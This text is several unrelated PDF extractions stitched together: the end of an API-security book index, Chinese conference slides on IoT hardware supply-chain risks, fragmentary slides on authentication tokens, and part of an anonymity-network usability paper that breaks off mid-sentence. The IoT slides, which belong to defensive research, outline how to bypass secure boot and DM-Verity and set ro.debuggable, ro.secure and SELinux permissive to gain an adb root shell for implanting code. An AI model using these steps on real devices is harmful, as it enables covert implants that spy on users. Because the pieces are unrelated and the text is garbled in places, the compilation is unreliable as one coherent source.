draft (also submitted by Hammer) followed with some improvements in February 2012. Both drafts were mostly influenced by the OAuth 1.0 architecture. After a long break, and after Hammer’s resignation from the OAuth working group, the Internet draft 4 of the MAC Token Profile introduced a revamped architecture. This architecture, which was discussed in this chapter, has many architectural differences from OAuth 1.0 (see Table G-1). AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 437 Table G-1. OAuth 1.0 vs. OAuth 2.0 MAC Token Profile OAuth 1.0 OAuth 2.0 MAC Token Profile Requires a signature both during the initial handshake and during the business ApI invocation. Requires a signature only for the business ApI invocation. The resource server must know the secret key used to sign the message beforehand. The shared secret doesn’t have an associated lifetime. doesn’t have any audience restrictions. Tokens can be used against any resource server. The encrypted shared secret used to sign the message is passed to the resource server, embedded in the access_token. A lifetime is associated with the mac_key, which is used as the key to sign. The authorization server enforces an audience restriction on the issued access_tokens, so that those access tokens can’t be used against any resource server. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 439 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4 Index A Access delegation problem, 81 Access token, 86, 93, 251 access_token parameter, 220 Additional authentication data (AAD), 185, 192, 194, 200 Advanced encryption standard (AES), 49, 192 Alert protocol, 365 alias argument, 74 Amazon Web Services (AWS), 3, 51, 52, 103 Apache Directory Server (LDAP) connections, 415 connecting Apache Tomcat, 417 organizational unit structure, creation, 416 test connection, 416 Application programming interface (API) Amazon, 3, 4 Big Data, 2 Business models, 12 database implementations, 15 definition, 13 Facebook, 6, 7 governments, 9 healthcare industry, 10 IBM Watson technology, 9 IoT, 2 Java RMI, 16 JDBC, 14 kernel, 13, 14 lifecycle, 22 management platform, 23 marshalling/unmarshalling technique, 16 Netflix, 7 Open Bank, 10 ProgrammableWeb, 19 reasons, 3 Salesforce, 5 SOAP, 17 swagger, 24 Uber, 5, 6 UDDI, 23 Walgreens, 8 wearable industry, 11 Auditing, 65, 89 Authenticated Encryption with Associated Data (AEAD), 191, 192, 194 Authentication, 59 biometric-based, 62 brute-force attack, 60 certificates and smart card–based, 61 identity provider, 59 Authorization, 62 access control list, 63 DAC, 62 MAC, 63 Authorization API, 389, 394, 396 Authorization API token (AAT), 389–391 440 Authorization code grant type authorize endpoint, 85 callback URL, 85 lifetime, 86 token endpoint, 87 Availability, security triad, 57–58 B Base64 encoding, 397, 398 Bearer tokens, 427 Brokered authentication client applications, 258–260 OAuth authorization server, 258 OAuth principles, 259 Brokered delegation, 322–323 Browser-less apps, 237–240 C Certificate authority (CA), 65, 74 Chained access delegation API, 313 end user, 314 JWT access token, 314 OAuth 2.0 Token Delegation profile, 314 OpenID Connect, 314 Chain grant type profile, 216, 226 authorization server, 216, 226 resource server, 216 scope parameter, 216 Change Cipher Spec protocol, 365 Claim gathering authorization policies, 286 claim_redirect_uri, 285 claim_token parameter, 284 HTTP redirect, 285 RPT, 285 client_assertion_type, 271 Client credentials grant type, 91, 92 client_id, 271 Code interception attack, 300, 301 Complete mediation principle, 49, 66 Computer Security Institute (CSI), 42 Content Encryption Key (CEK), 189–191 Cross-Site Request Forgery (CSRF) OAuth 2.0 attacker, 291 authorization code, 291, 293 callback URL, 292 PKCE, 293 state parameter, 293 target web site, 293 victim, 292 victim’s browser, 291 cURL command, 429 D Database management systems (DBMSs), 14 Data breaches, 34, 48, 66 Data Encryption Standard (DES), 49 Delegated access control identity provider, 309, 310 JWT, 310, 311 no credentials, 318 OAuth 2.0 MAC tokens, 318 resource STS, 316–318 Denial of service (DoS), 21 Design challenges, 37 defense in depth, 41, 42 insider attacks, 42, 43 performance, 39, 40 security by obscurity, 44, 45 Index 441 user experience, 38 weakest links, 40, 41 Design principles, 45 Direct authentication, trusted subsystem, 305, 306 Direct vs. brokered delegation, 322, 323 Direct encryption, 194, 203 Direct key agreement, 193, 203 Discretionary Access Control (DAC), 62, 63 Distributed denial of service (DDoS), 33, 57, 125 Docker in Action, 78 docker run command, 78 Document type definition (DTD), 58 Domain Name Service (DNS), 76, 109 Dynamic client registration, 220–224, 226, 227 E Economy of mechanism principle, 48, 66 encryptedkey parameter, 198 Export ciphers, 47, 48 Exported keying material (EKM), 248, 250, 253 eXtensible Access Control Markup Language (XACML), 63, 316 F Facebook, 6–7, 35 Fail-safe defaults principle, 46–48 Federation access token, 257 authorization code, 257 identity management systems, 257 Financial-grade API (FAPI), 287 Flickr, 8, 322, 327 Fraud-detection patterns, 65 G Galois/Counter Mode (GCM), 192 GitHub, 402 Google AuthSub, 326–327 Google Docs, 279, 284, 302 grant_type parameter, 87, 91, 144 G Suite, 304 H Handshake protocol, 365 Alert protocol, 365 Certificate Verify message, 372 Change Cipher Spec protocol, 365 Cipher suites, 370 Client Hello message, 367, 368 Client Key Exchange, 373 premaster key, 371 Server Change Cipher Spec, 374 Server Hello message, 369 Harvard Business Review (HBR), 43 Hash-based Message Authentication Code (HMAC), 97, 158, 433 Hash collision attack (HashDoS), 58 HMAC-SHA256 JSON payload, 178, 180 non-JSON payload, 183, 184 HTTP basic authentication GitHub API, accessing, 402–405 vs. HTTP digest authentication, 411 1.0 specification, 402 Recipe API, 418, 419 HTTP digest authentication client key elements, 408, 410 MD5-sess, 410 Index 442 1.0 specification, 406 Recipe API, 422 RFC 2617, 410 server key elements, RFC 2617, 407 WWW-Authenticate challenge, 411 HTTP Request-Line, 433 Hypertext Transfer Protocol (HTTP), 18, 358 Hypervisor, 52 I iCloud password, 37 Identity delegation model, 321 evolution Flickr, 327 Google AuthSub, 326, 327 Google client login, 325 history, 323 OAuth, 328–330 protocols, 330 SlideShare, pre-2006, 324 Twitter, pre-2006, 324 Yahoo! BBAuth, 327, 328 Identity provider mix-up, 287 attack, 289 authorization server, 290 callback URLs, 290 grant type, 290 IdP options, 288 IETF draft specification, 290 redirection, 289 TLS, 288 Identity theft resource center, 34 Implicit grant type, 88–90, 301, 302 Indirect delegation, 322 Infrastructure as a service (IaaS), 38, 52 Integrated development environment (IDE), 70 Integrated Windows Authentication (IWA), 308 Integrity, 56 Inter-app communication HTTPS URI scheme, 234 loopback interface, 234 private URI scheme, 234 Internet of Things (IoT), 1 Internet Protocol (IP), 359 J Java Database Connectivity (JDBC), 14, 15 Java KeyStore (JKS), 74 JavaScript object signing and encryption (JOSE) claims set, 160, 161 specification, 161–163 header, 158 parameters, 159 signature, 163–166 working groups, 166 JSON Web Encryption (JWE), 136, 185 JSON Web Signature (JWS), 56, 136, 167 compact serialization (see JWS compact serialization) JWS JSON serialization (see JWS JSON serialization) JSON Web Signature, nonrepudiation, 311, 312 JSON Web Token (JWT), 97, 121, 134, 157, 267 aud parameter, 274 authorization server, 121, 123, 124 exp parameter, 275 MAC, 275 HTTP digest authentication (cont.) Index 443 nbf parameter, 275 token validation, 274 JWE compact serialization, 185 ciphertext, 194 initialization vector, 194 JOSE header, 186, 188–191 JWE Encrypted Key, 191 process of encryption, 195, 196 JWE JSON serialization, 196 authentication tag, 199 ciphertext, 198 encryption process, 199, 200 initialization vector, 198 per-recipient unprotected header, 198 protected header, 197 unprotected header, 197 JWE vs. JWS, 202, 203 JWS compact serialization JOSE header, 167, 169–172 JWS payload, 172 JWS signature, 172 process of signing, 172, 173 JWS JSON serialization, 174 building ingredients, 176, 177 payload, 174 protected header, 175 signature, 175 unprotected header, 175 JWT client authentication application, 271–273 OAuth authorization server, 270 parameters, 271 RFC 7523, 271 JWT grant type applications, 269, 270 assertion, 268 grant_type, 268 identity provider, 267 OAuth 2.0, grant types, 267 RFC 7521, 268 scope parameter, 268 JWT Secured Authorization Request (JAR), 97, 98 K Keep it simple, stupid (KISS) principle, 48 Kerckhoffs’ principle, 44, 66 Key agreement, key wrapping, 193 Key encryption, 193 Key generation, 247 Key wrapping, 193 L Least common mechanism, 52, 53 Lightweight directory access protocol (LDAP), 40 Linux Security Modules (LSM), 63 M MD5 algorithm, 38 Message Authentication Code (MAC), 64, 275 Message Authentication Code (MAC) Token Profile, 425 Microservices business capabilities, 29 componentization, 28 decentralized governance, 30 design for failure, 31 infrastructure automation, 30 products, 29 smart endpoints, 29 Index 444 Microsoft Active Directory (AD), 305 Mobile Single Sign-On (SSO), login direct credentials, 228, 229 system browser, 230, 231 WebView, 229, 230 Multifactor authentication, 59, 60 Mutual Transport Layer Security (mTLS), 220, 305 N National Security Agency (NSA), 41, 46, 355 Nested JWT, 201, 207, 209 Netflix API, 25 Nginx, 246, 254 Nonrepudiation, 64, 65, 312 O OAuth 1.0 oauth signature building signature, 343 business API invocation, 344, 346 PLAINTEXT method, 340 temporary-credential request phase, 340, 342 token credential request phase, 342 three-legges vs. two-legged oauth, 346 token dance business API, invoking, 338, 339 resource-owner authorization phase, 335 temporary-credential request endpoint, 333, 334 token-credential request phase, 336, 337 OAuth 1.0 vs. OAuth 2.0, 96 OAuth 2.0 access delegation problem, 81, 83 actors role, 83 client types confidential clients, 96 public clients, 96 MAC Token Profile access token, 431 audience parameter, 431 vs. Bearer token, 427 cURL command, 429 grant types, 436 HMAC-SHA1, 433 HMAC-SHA256, 433 parameter, 430 protected API invocation, 432 HTTP Request-Line, 433, 434 resource server, validation, 435, 436 response_type value, 428 refresh token, 92 WRAP (see Web resource authorization profiles (WRAP)) OAuth 2.0 device authorization grant authorization request, 239, 240 authorization server, 238 draft proposal, 237 expires_in parameter, 239 grant_type parameter, 239 login flow, 238 OAuth 2.0 Grant Types vs. OAuth WRAP Profiles, 84 OAuth 2.0 MAC Token Profile vs. OAuth 2.0, 437 OAuth 2.0, native mobile app access token, 233 authorization, 233 Client Registration profile, 232 Index 445 identity provider, 232 inter-app (see Inter-app communication) login flow, 232 PKCE, 235–237 URL scheme, 233 OAuth 2.0 refresh tokens, 249 OAuth 2.0 token validation, 109 OAuth bearer token, 95 Open design principle, 49, 50 OpenID connect Amazon, 132 API security, 154 directed identity, 131 dynamic client registration, 151, 155 flow chart representation, 148 identity provider metadata, 149 ID token, 134 attributes, 134 JWE, 136 JWS, 136 JWT, 134 overview, 129 protocol flow, 131 relying party, 130 request attributes, 139 user attributes, 142, 145 WebFinger protocol, 146 identity provider, 149 rel parameter, 148 resource parameter, 148 Open policy agent (OPA), 64 Open redirector attack, 299 attack, prevention, 299, 300 query parameter, 298 redirect_uri, 298 OpenSSL on Docker, 78, 79 Optimal asymmetric encryption padding (OAEP) method, 192 P, Q @PathVariable, 72 Perfect forward secrecy (PFS), 376 Personal financial management (PFM) application, 277, 281 Phishing attack domain name, 303 Facebook, 304 Google Docs, 302, 303 G Suite, 304 PLAINTEXT oauth_signature_method, 340 Principle of psychological acceptability, 53 Principle of separation of privilege states, 51 Principles of least privilege, 45, 46 Profiles chain grant type, 216–218 dynamic client registration profile, 220–224 token introspection (see Token introspection profile) token revocation, 225, 226 Proof key for code exchange (PKCE), 253, 293 authorization code, 235, 236 code_challenge, 236 code_verifier, 236, 237 defined, 235 login flow, 235 Proof of possession, 247–249 Protection API, 395 Protection API token (PAT), 387 ProtectServe protocol, 377, 378 Index 446 Public Key Cryptography Standards (PKCS), 74 Pushed Authorization Requests (PAR), 99, 100 R Recipe API, 412, 413 Reference token, 121 Referred token binding, 251 Refresh grant type, 92 Refresh token, 88 Requesting party token (RPT), 283, 285 @RequestMapping, 72 Resource owner, 331 Resource owner password credentials grant type, 90, 91 Resource security token service (STS), 316–318 @RestController, 72 RFC 2617, 406, 410 RFC 7523, 267, 270 Role of APIs Netflix, 32 SOA, 28 vs. service, 25, 26 RPT endpoint, 391 RSA-OAEP and AES JSON payload, 203–205 non-JSON payload, 206, 207 RSA-SHA256, JSON payload, 181, 182 S SAML grant type brokered authentication, 265, 266 OAuth Introspection specification, 267 out of band, 266 POST message, 266 trust broker, 265 SAML 2.0 client authentication client_assertion parameter, 264 client_assertion_type, 261 SAML assertion, 262, 263 SAML 2.0 identity provider, 309 scope, 84 Sec-Token-Binding, 248 Secure Sockets Layer (SSL), 47 Security assertion markup language (SAML), 98, 261 Security assertion markup language (SAML) 2.0, 306 Security token service (STS) OAuth 2.0 authorization setting up, 110–112 testing, 112–114 Zuul API Gateway, 114–116 Self-contained token, 94, 121 Service-oriented architecture (SOA), 17, 28 SFSafariViewController, 232 Simple Web Token (SWT), 158 Single-page application (SPA), 295 Single Sign-On delegated access control, 306–308 IWA, 308 Spring-boot-starter-actuator dependency, 71 Spring initializer, 70 Spring tool suite (STS), 70 SYN ACK packet, 360, 361 T TCP ACK packet, 361 TLS termination, 254, 255 Token-based authentication, 331 Index 447 Token binding, 248 key generation phase, 245 message, 248 negotiation phase, 244 OAuth 2.0 Authorization code/access token, 251–254 OAuth 2.0 refresh tokens, 249–251 phases, 244 proof of possession phase, 245 TLS, 244 Token Binding Protocol specification (RFC 8471), 248 Token Binding TLS extension, 246 token_endpoint_auth_method, 221 Token exchange IETF working group, 217 JSON response, 220 parameters, 218, 219 Token introspection profile, 212, 226 HTTP authentication, 212 JSON response, 212 validation, 215 Token leakage/export, 296, 298 Token reuse access token, 294 OAuth 2.0 client application, 294 OpenID Connect, 295 resource server, 294 security checks, 295 SPA, 295 Token revocation profile, 225, 226 Transmission control protocol (TCP), 358–363 Transport Layer Security (TLS), 35, 47, 90, 107, 243, 406 Apache Tomcat, 420, 421 deploying order API, 71–73 directory, 70 Handshake (see Handshake protocol) microservices development framework, 69 mutual authentication, 376 Netscape communications, 356–358 online resources, 70 protecting order API, 76–78 role, 355 securing order API, 74–76 spring boot, 70 TCP, 358 HTTP, 358 IP functions, 359 layers, 359, 360 SYN ACK packet, 360, 361 TCP packet, 361, 362 working application data transfer, 374, 375 layers, 365 Trinity of trouble, 34 extensibility, 36 system design, 37 TLS, 35 Trusted master access delegation access token, 316 centralized Active Directory, 315 SSO, 316 web applications, 315 XACML, 316 Trusted platform module (TPM), 247 U UMA 1.0 architecture, 384 phases authorization, getting, 388–390, 392–394 Index 448 resources, accessing, 394 resources, protecting, 385, 387, 388 UMA 2.0, bank use case cURL command, 280 introspection, 283 OpenID Connect, 282 PFM, 281, 282, 284 RPT, 283 UMA authorization server, 280 Uniform resource name (URN), 294 Universal 2nd Factor (U2F), 61 Universal description, discovery, and integration (UDDI), 23 Unmanaged API, 20 User-Managed Access (UMA) APIs authorization, 396 protection, 395 Protection API, 394 authorization server, 279 OAuth, 384 bank accounts, 277, 278 defined, 277 Google Doc, 278, 279 ProtectServe protocol authorization manager, 377 consumer, 380–383 flow, 378 service provider, 377 steps, 378 roles, 279 UMA 2.0 Grant, 280 V Validity argument, 74 Virtual private cloud (VPC), 52 W Web application description language (WADL), 23 Web application firewall (WAF), 125, 126 Web resource authorization profiles (WRAP), 347 autonomous client profiles, 348 Assertion profile, 350 client account profile, 349 Password profile, 349 grant types, 84, 354 authorization code, 85 client credentials, 92 implicit code, 89 resource owner, 90 protected resource, 354 token types, 94, 354 Bearer token profile, 94 MAC token profile, 94 user delegation profiles, 348 Rich APP profile, 353 username and password profile, 350, 351 Web APP profile, 352 Web services description language (WSDL), 17 Web services interoperability (WS-I), 17 WebView, 229 WS-Trust, 262, 264 X XACML, 64, 166 XML signature, 178 UMA 1.0 (cont.) Index 449 Y Yahoo! Browser–Based Authentication (BBAuth), 327 Z Zero-trust network pattern, 306 Zuul API gateway, 103 cURL client, 105 enable TLS, 107–109 JWT, 124, 125 OAuth 2.0 token validation, 109 run, 105, 106 STS over TLS, 117–120 Index
pdf
你的智能硬件出卖了你的信息 —浅谈办公及教育场景硬件供应链安全 0 1 议程 • IoT产品供应链的安全现状 • 常见的保护机制及实现缺陷 • 如何避免缺陷,保护供应链安全 0 4 IoT产品供应链安全现状 金立2千多部手机被植入木马 软件供应链攻击易受关注,而 硬件供应链在流通环节的攻击, 非常容易被忽视。 0 5 IoT产品供应链安全现状 国内外的相关规范 0 7 IoT产品供应链安全现状 业界的做法 主流的桌面处理器、服务器、 笔电、操作系统厂商,很早就 实现了安全启动,可信计算等 机制。 0 8 IoT产品供应链安全现状 移动处理器厂商 高通、MTK等IoT 常用方案厂商都提 供了完整的 SecureBoot、TEE 的实现支持,提供 了可靠的保护机制。 0 9 在我们的研究中,累计发现5个头部厂商的9款IoT产品(芯片方案有完整 的安全启动支持),存在设计缺陷,导致产品可以在供应链流通环节被 植入恶意代码。 IoT产品供应链安全现状 实际落实到IoT产品端的情况 IoT产品供应链安全现状 10 攻击需要物理接触, 厂商不重视,不认可 只是缺陷,不是漏洞 IoT产品供应链安全现状 11 复杂的供应链网络,导 致产品在到达客户之前 的流通环节,存在大量 被供应链植入的时间窗 口。 虽是缺陷,后果严重 12 智能盒子 智能电视 会议终端 IoT产品供应链安全现状 虽是缺陷,后果严重 窃取商业机密 13 IoT产品供应链安全现状 虽是缺陷,后果严重 没有安全保护的教 育硬件,可能被破 解改变产品原有设 计用途,变身为游 戏机、浏览不良信 息的媒介等。 14 智能音箱 智能教育屏 智能学习灯 IoT产品供应链安全现状 虽是缺陷,后果严重 监控家庭敏感地带 15 IoT产品供应链安全现状 某教育产品供应链植 入风险演示 16 常见的保护机制及实现缺陷 常见的保护机制及实现缺陷 17 Android ROM 常见的保护机制及实现缺陷 18 Secure Boot 核心思想:当前阶段的启动代码加载下一级代码之前,对 所加载的代码基于PKI进行完整性校验。 常见的保护机制及实现缺陷 19 信任根 所有支持 Secure Boot的CPU都会有 一块很小的OTP储存,也称为 FUSE 或者eFUSE,它的工作原理跟现实中 的保险丝类似:在芯片出厂之前会 被写入信息,一旦被写入便无法被 更改 常见的保护机制及实现缺陷 22 DM-Verity • 对于小分区,会使用信 任根进行直接或间接签 名的。 • 对于较大的分区,比如 system分区,与预置的 root hash进行比对验证。 常见的保护机制及实现缺陷 23 信任根 -> Boot Verify -> DM Verity 牢不可破? 常见的保护机制及实现缺陷 25 绕过 SECURE BOOT 90%以上均未烧写eFuse 可以直接绕过 虽然安全启动没开,但是 从BootLoader向下的保护 机制可能是开启的,需要 拿到固件,分析保护逻辑。 常见的保护机制及实现缺陷 26 没有开启安全启动, 利用芯片厂商工具读写整个磁盘固件(MTK) 绕过 SECURE BOOT 常见的保护机制及实现缺陷 27 没有开启安全启动, 利用芯片厂商工具 读写整个磁盘固件 ( QUALCOMM3) 绕过 SECURE BOOT 常见的保护机制及实现缺陷 28 • frp • seccfg seccfg结构体 seccfg body 结构体 通过固件分析绕过Boot Verify 常见的保护机制及实现缺陷 29 通过固件分析绕过Boot Verify 常见的保护机制及实现缺陷 30 通过固件分析绕过DM-Verity 常见的保护机制及实现缺陷 31 使能adb 禁用SE-Linux 获取 adb root shell set property ro.debuggable = 1 … androidboot.selinux=permissive ro.secure = 0 Gain Full Access Get Full Access 常见的保护机制及实现缺陷 32 某会议盒子供应链植入风险 演示 33 如何避免缺陷,保护供应链安全 如何避免缺陷,保护产品安全 35 • 安全意识,认为接触式攻击不属于漏洞 • 芯片成本,支持安全启动的芯片增加成本 • 研发成本,不想在保护机制上投入人力物力 • 维修成本,开启安全启动增加维修难度 部分厂商的现状 提高安全意识,将安全特性支持考虑到产品基础成本里。 如何避免缺陷,保护产品安全 36 • 采用巧妙的后门,隐藏调试开关。 • 对控制调试的程序进行混淆加密,增加分析成本。 • 在底层Framework上,定制程序的安装逻辑,对抗植入。 部分厂商的保护方案 完美的保护机制也需要在根源上做到安全。 如何避免缺陷,保护产品安全 34 需求 设计 EVT DVT PVT 售卖 硬件产品不同阶段的缺陷修复需要付出的代价 安全应该尽早的介入到 硬件产品的设计研发流 程中。 如何避免缺陷,保护产品安全 37 通过建立IoT产品SDLC流程,在立项 阶段就进行安全介入,解决上线后不 可召回的漏洞,避免产品遭受供应链 植入攻击。 立项 Souring EVT DVT PVT IoT SDLC M A N O E U V R E 感谢观看!
pdf
Jim Knowledge factors Ownership factors Inherence factors Password Pass phrase Personal identification number (PIN) Challenge response (the user must answer a question) ID card Security token Software token Phone Cell phone Fingerprint Retinal pattern DNA Signature Face Voice Unique bio-electric signals, or other biometric identifier).  ID card—Fake Card  ID card—Fake Card  Security token—High Security Protection  ID card—Fake Card  Security token—High Security Protection  Software token—Export Token  Phone—Fake Phone Number  ID card—Fake Card  Security token—High Security Protection  Software token—Export Token  Phone—Fake Phone Number  Cell phone—Fake Phone Number and Phone ID  ID card—Fake Card  Security token—High Security Protection  Software token—Export Token  Phone—Fake Phone Number  Cell phone—Fake Phone Number and Phone ID Static Password Synchronous Dynamic Password Asynchronous Password Challenge Response  Digital signature  Digital signature  Disconnected tokens  Digital signature  Disconnected tokens  Connected tokens  Smart Card  Contactless tokens  Bluetooth tokens  Digital signature  Disconnected tokens  Connected tokens  Smart Card  Contactless tokens  Bluetooth tokens  Single sign-on software tokens Fire and Forget For Time based or event based authentication. No Input data confirm/check function. Fire and Forget For Time based or event based authentication. No Input data confirm/check function. Auto Response For data confirm/check function.  Most connected Token designed as Auto Response Type.  One PIN Code Protection  Digital signature  Support data confirm/check function Auto Response Token  Do not use fixed input data format  Add Trap for protection  Add Dynamic PIN for system Level Fire and Forget Token Unique ID / No entry for attack path / Mixed Mode with Auto Response and Fire and Forget.
pdf
Anonymity Loves Company: Usability and the Network Effect Roger Dingledine and Nick Mathewson The Free Haven Project {arma,nickm}@freehaven.net Abstract. A growing field of literature is studying how usability im- pacts security [4]. One class of security software is anonymizing networks— overlay networks on the Internet that provide privacy by letting users transact (for example, fetch a web page or send an email) without re- vealing their communication partners. In this position paper we focus on the network effects of usability on privacy and security: usability is a factor as before, but the size of the user base also becomes a factor. We show that in anonymizing networks, even if you were smart enough and had enough time to use every system perfectly, you would nevertheless be right to choose your system based in part on its usability for other users. 1 Usability for others impacts your security While security software is the product of developers, the security it provides is a collaboration between developers and users. It’s not enough to make software that can be used securely—software that is hard to use often suffers in its security as a result. For example, suppose there are two popular mail encryption programs: Heavy- Crypto, which is more secure (when used correctly), and LightCrypto, which is easier to use. Suppose you can use either one, or both. Which should you choose? You might decide to use HeavyCrypto, since it protects your secrets better. But if you do, it’s likelier that when your friends send you confidential email, they’ll make a mistake and encrypt it badly or not at all. With LightCrypto, you can at least be more certain that all your friends’ correspondence with you will get some protection. What if you used both programs? If your tech-savvy friends use HeavyCrypto, and your less sophisticated friends use LightCrypto, then everybody will get as much protection as they can. But can all your friends really judge how able they are? If not, then by supporting a less usable option, you’ve made it likelier that your non-savvy friends will shoot themselves in the foot. The crucial insight here is that for email encryption, security is a collabora- tion between multiple people: both the sender and the receiver of a secret email must work together to protect its confidentiality. Thus, in order to protect your own security, you need to make sure that the system you use is not only usable by yourself, but by the other participants as well. This observation doesn’t mean that it’s always better to choose usability over security, of course: if a system doesn’t address your threat model, no amount of usability can make it secure. But conversely, if the people who need to use a system can’t or won’t use it correctly, its ideal security properties are irrelevant. Hard-to-use programs and protocols can hurt security in many ways: • Programs with insecure modes of operation are bound to be used unknow- ingly in those modes. • Optional security, once disabled, is often never re-enabled. For example, many users who ordinarily disable browser cookies for privacy reasons wind up re-enabling them so they can access sites that require cookies, and later leaving cookies enabled for all sites. • Badly labeled off switches for security are even worse: not only are they more prone to accidental selection, but they’re more vulnerable to social attackers who trick users into disabling their security. As an example, consider the page-long warning your browser provides when you go to a website with an expired or otherwise suspicious SSL certificate. • Inconvenient security is often abandoned in the name of day-to-day effi- ciency: people often write down difficult passwords to keep from forgetting them, and share passwords in order to work together. • Systems that provide a false sense of security prevent users from taking real measures to protect themselves: breakable encryption on ZIP archives, for example, can fool users into thinking that they don’t need to encrypt email containing ZIP archives. • Systems that provide bad mental models for their security can trick users into believing they are more safe than they really are: for example, many users interpret the “lock” icon in their web browsers to mean “You can safely enter personal information,” when its meaning is closer to “Nobody can read your information on its way to the named website.”1 2 Usability is even more important for privacy We described above that usability affects security in systems that aim to pro- tect data confidentiality. But when the goal is privacy, it can become even more important. Anonymizing networks such as Tor [8], JAP [3], Mixminion [6], and Mixmaster [12] aim to hide not only what is being said, but also who is com- municating with whom, which users are using which websites, and so on. These systems have a broad range of users, including ordinary citizens who want to avoid being profiled for targeted advertisements, corporations who don’t want to reveal information to their competitors, and law enforcement and government intelligence agencies who need to do operations on the Internet without being noticed. 1 Or more accurately, “Nobody can read your information on its way to someone who was able to convince one of the dozens to hundreds of CAs configured in your browser that they are the named website, or who was able to compromise the named website later on. Unless your computer has been compromised already.” Anonymity networks work by hiding users among users. An eavesdropper might be able to tell that Alice, Bob, and Carol are all using the network, but should not be able to tell which of them is talking to Dave. This property is summarized in the notion of an anonymity set—the total set of people who, so far as the attacker can tell, might be the one engaging in some activity of interest. The larger the set, the more anonymous the participants.2 When more users join the network, existing users become more secure, even if the new users never talk to the existing ones! [1, 2] Thus, “anonymity loves company.”3 In a data confidentiality system like PGP, Alice and Bob can decide by themselves that they want to get security. As long as they both use the software properly, no third party can intercept the traffic and break their encryption. However, Alice and Bob can’t get anonymity by themselves: they need to par- ticipate in an infrastructure that coordinates users to provide cover for each other. No organization can build this infrastructure for its own sole use. If a single corporation or government agency were to build a private network to protect its operations, any connections entering or leaving that network would be obviously linkable to the controlling organization. The members and operations of that agency would be easier, not harder, to distinguish. Thus, to provide anonymity to any of its users, the network must accept traffic from external users, so the various user groups can blend together. In practice, existing commercial anonymity solutions (like Anonymizer.com) are based on a set of single-hop proxies. In these systems, each user connects to a single proxy, which then relays the user’s traffic. Single proxies provide comparatively weak security, since a compromised proxy can trivially observe all of its users’ actions, and an eavesdropper only needs to watch a single proxy to perform timing correlation attacks against all its users’ traffic. Worse, all users need to trust the proxy company to have good security itself as well as to not reveal user activities. The solution is distributed trust: an infrastructure made up of many inde- pendently controlled proxies that work together to make sure no transaction’s privacy relies on any single proxy. With distributed-trust anonymity networks, users build tunnels or circuits through a series of servers. They encrypt their traffic in multiple layers of encryption, and each server removes a single layer of encryption. No single server knows the entire path from the user to the user’s chosen destination. Therefore an attacker can’t break the user’s anonymity by compromising or eavesdropping on any one server. 2 Assuming that all participants are equally plausible, of course. If the attacker sus- pects Alice, Bob, and Carol equally, Alice is more anonymous than if the attacker is 98% suspicious of Alice and 1% suspicious of Bob and Carol, even though the anonymity sets are the same size. Because of this imprecision, research is moving beyond simple anonymity sets to more sophisticated measures based on the attacker’s confidence [7, 14]. 3 This catch-phrase was first made popular in our context by the authors of the Crowds [13] anonymity network. Despite their increased security, distributed-trust anonymity networks have their disadvantages. Because traffic needs to be relayed through multiple servers, performance is often (but not always) worse. Also, the software to implement a distributed-trust anonymity network is significantly more difficult to design and implement. Beyond these issues of the architecture and ownership of the network, how- ever, there is another catch. For users to keep the same anonymity set, they need to act like each other. If Alice’s client acts completely unlike Bob’s client, or if Alice’s messages leave the system acting completely unlike Bob’s, the attacker can use this information. In the worst case, Alice’s messages stand out entering and leaving the network, and the attacker can treat Alice and those like her as if they were on a separate network of their own. But even if Alice’s messages are only recognizable as they leave the network, an attacker can use this infor- mation to break exiting messages into “messages from User1,” “messages from User2,” and so on, and can now get away with linking messages to their senders as groups, rather than trying to guess from individual messages [6, 11]. Some of this partitioning is inevitable: if Alice speaks Arabic and Bob speaks Bulgarian, we can’t force them both to learn English in order to mask each other. What does this imply for usability? More so than with encryption systems, users of anonymizing networks may need to choose their systems based on how usable others will find them, in order to get the protection of a larger anonymity set. 3 Case study: usability means users, users mean security We’ll consider an example. Practical anonymizing networks fall into two broad classes. High-latency networks like Mixminion or Mixmaster can resist strong attackers who can watch the whole network and control a large part of the network infrastructure. To prevent this “global attacker” from linking senders to recipients by correlating when messages enter and leave the system, high-latency networks introduce large delays into message delivery times, and are thus only suitable for applications like email and bulk data delivery—most users aren’t willing to wait half an hour for their web pages to load. Low-latency networks like Tor, on the other hand, are fast enough for web browsing, secure shell, and other interactive applications, but have a weaker threat model: an attacker who watches or controls both ends of a communication can trivially correlate message timing and link the communicating parties [5, 10]. Clearly, users who need to resist strong attackers must choose high-latency networks or nothing at all, and users who need to anonymize interactive appli- cations must choose low-latency networks or nothing at all. But what should flexible users choose? Against an unknown threat model, with a non-interactive application (such as email), is it more secure to choose security or usability? Security, we might decide. If the attacker turns out to be strong, then we’ll prefer the high-latency network, and if the attacker is weak, then the extra protection doesn’t hurt. But since many users might find the high-latency network inconvenient, sup- pose that it gets few actual users—so few, in fact, that its maximum anonymity set is too small for our needs. In this case, we need to pick the low-latency sys- tem, since the high-latency system, though it always protects us, never protects us enough; whereas the low-latency system can give us enough protection against at least some attackers. This decision is especially messy because even the developers who implement these anonymizing networks can’t recommend which approach is safer, since they can’t predict how many users each network will get and they can’t predict the capabilities of the attackers we might see in the wild. Worse, the anonymity research field is still young, and doesn’t have many convincing techniques for measuring and comparing the protection we get from various situations. So even if the developers or users could somehow divine what level of anonymity they require and what their expected attacker can do, the researchers still don’t know what parameter values to recommend. 4 Case study: against options Too often, designers faced with a security decision bow out, and instead leave the choice as an option: protocol designers leave implementors to decide, and implementors leave the choice for their users. This approach can be bad for security systems, and is nearly always bad for privacy systems. With security: • Extra options often delegate security decisions to those least able to under- stand what they imply. If the protocol designer can’t decide whether the AES encryption algorithm is better than the Twofish encryption algorithm, how is the end user supposed to pick? • Options make code harder to audit by increasing the volume of code, by increasing the number of possible configurations exponentially, and by guar- anteeing that non-default configurations will receive little testing in the field. If AES is always the default, even with several independent implementations of your protocol, how long will it take to notice if the Twofish implementation is wrong? Most users stay with default configurations as long as they work, and only reconfigure their software as necessary to make it usable. For example, suppose the developers of a web browser can’t decide whether to support a given exten- sion with unknown security implications, so they leave it as a user-adjustable option, thinking that users can enable or disable the extension based on their security needs. In reality, however, if the extension is enabled by default, nearly all users will leave it on whether it’s secure or not; and if the extension is dis- abled by default, users will tend to enable it based on their perceived demand for the extension rather than their security needs. Thus, only the most savvy and security-conscious users—the ones who know more about web security than the developers themselves—will actually wind up understanding the security implications of their decision. The real issue here is that designers often end up with a situation where they need to choose between ‘insecure’ and ‘inconvenient’ as the default configuration— meaning they’ve already made a mistake in 